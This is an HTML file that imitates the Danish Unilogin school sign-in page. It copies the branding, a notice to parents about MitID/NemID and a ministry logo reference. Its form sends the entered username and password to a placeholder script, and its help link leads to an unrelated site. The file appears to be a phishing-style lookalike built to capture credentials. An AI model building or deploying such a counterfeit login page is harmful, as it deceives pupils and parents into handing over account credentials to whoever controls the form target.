<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Login Form</title>

    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link href="https://fonts.googleapis.com/css2?family=Noto+Sans+JP:wght@300;400;600&display=swap" rel="stylesheet">     <style>
        body {

            font-family: 'Noto Sans JP', sans-serif;
            font-size: 0.9em;
            font-weight: 400;
            background-color: #f4f4f4;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            margin: 0;
        }
        .warning {
            background-color: #fec;
            border-left: 8px solid #febb30;
            padding: 16px;
            margin-bottom: 10px;
        }
        .login-box {
            background-color: #fff;
            padding: 70px 70px 20px 70px;
            border-radius: 1px;
            box-shadow: 11px 30px 154px 80px rgba(0, 0, 0, 0.1);
            width: 300px;
        }
        .login-box h2 {
            margin: 0 0 20px;
            font-size: 2em;
            font-weight: 600;
            
        }
        .login-box label {
            display: block;
            margin-bottom: 10px;
            font-weight: 600;
        }
        .login-box input[type="text"],
        .login-box input[type="password"] {
            width: 92%;
            padding: 10px;
            margin-bottom: 10px;
            border: 1px solid #000000;
            border-radius: 3px;
        }
        .login-box input[type="submit"] {
            margin-top: 11px;
            background-color: #0059b3;
            color: #fff;
            border: 1px solid #000000;
            width: 100%;
            padding: 10px 20px;
            border-radius: 5px;
            cursor: pointer;
            font-size: 1em;
            font-weight: 500;
        }
        .login-box input[type="submit"]:hover {
            background-color: #024996;
        }
        .footerlogo {
            width: 180px;
            margin-left: auto;
            margin-right: auto;
            padding-top:30px;
        }
        .andreMuligheder{
            margin-top: 30px;
            border-top: 1px solid #ccc9c9;
        }
        .andreMuligheder p {
            margin-bottom: 5px;;
        }
    </style>
</head>
<body>
    <div class="login-box">
        <h2><span style="color:#015ab3">Uni</span>login</h2>
        <div class="warning">
            <svg style="width:24px;height:24px;vertical-align: middle" viewBox="0 0 24 24">
                <path fill="#9b870c" d="M11,15H13V17H11V15M11,7H13V13H11V7M12,2C6.47,2 2,6.5 2,12A10,10 0 0,0 12,22A10,10 0 0,0 22,12A10,10 0 0,0 12,2M12,20A8,8 0 0,1 4,12A8,8 0 0,1 12,4A8,8 0 0,1 20,12A8,8 0 0,1 12,20Z"></path>
            </svg> Forældre bør logge ind med MitID/NemID
        </div>
        <form action="your_login_script.php" method="post">
            <label for="username">Brugernavn</label>
            <input type="text" id="username" name="username" required>

            <label for="password">Password</label>
            <input type="password" id="password" name="password" required>

            <input type="submit" value="Næste">
        </form>
        <div class="andreMuligheder">
            <p><b>Andre muligheder</b></p>
            <a href="https://meebook.com">Få mit eller mit barns brugernavn</a>
            
        </div>
        <div class="footerlogo">
            <img src="UVM_STIL_black_min.svg" alt="Børne- og Undervisningsministeriet - Styrelsen for IT og læring">
        </div>
    </div>
</body>
</html>
